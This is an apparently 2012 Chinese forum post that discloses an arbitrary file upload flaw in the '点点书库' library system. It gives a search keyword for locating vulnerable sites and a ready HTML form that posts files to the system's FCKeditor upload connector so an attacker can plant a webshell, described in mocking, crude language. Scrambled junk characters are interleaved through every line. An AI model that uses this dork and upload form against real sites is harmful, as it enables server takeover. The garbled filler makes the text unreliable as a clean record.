主题:图书馆系统任意文件上传漏洞
+ U) A1 e i& v, J 作者:冰锋刺客
! ?) ]6 s+ E5 a 厂商:点击书(dianjishu.com). `: Q& I ]6 Z& j3 Z! h; `3 i
日期:2012-6-21
3 G/ l, E f9 U* s: G, |0 c: ~
& R% T1 P |: g, q0 j: S ?: |I 概述
/ y4 k. E9 Y$ C, v# s: b 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
/ v4 s. K! v+ p0 @, [+ D' R II 简介
4 V) Q0 c' o3 C( x$ Z0 v 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"* r. m7 y* `8 o$ m5 U. p
补充一个漏洞; w. K5 k8 x! D
<form id="frmUpload" enctype="multipart/form-data"
6 y* k3 p2 ]8 ~! S( X action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>& C+ C7 h+ J; K: d+ O& t$ n2 d
<input id="btnUpload" type="submit" value="操翻他">" f3 |2 V: i( @4 j
</form>+ c4 o; E% q! G6 Z; t
你们懂的/ c7 |$ j+ j# N: P! I
那傻逼提供还需要改包.4 M: D5 c5 g% I" v4 |' S: l9 F
自己看了下源代码发现fckeditor: s1 d5 f; ~) W p; N4 M9 \0 L
直接秒杀
9 L. ]# {+ ~+ L1 y |
发表于 2012-9-10 21:20:59
收藏
支持
反对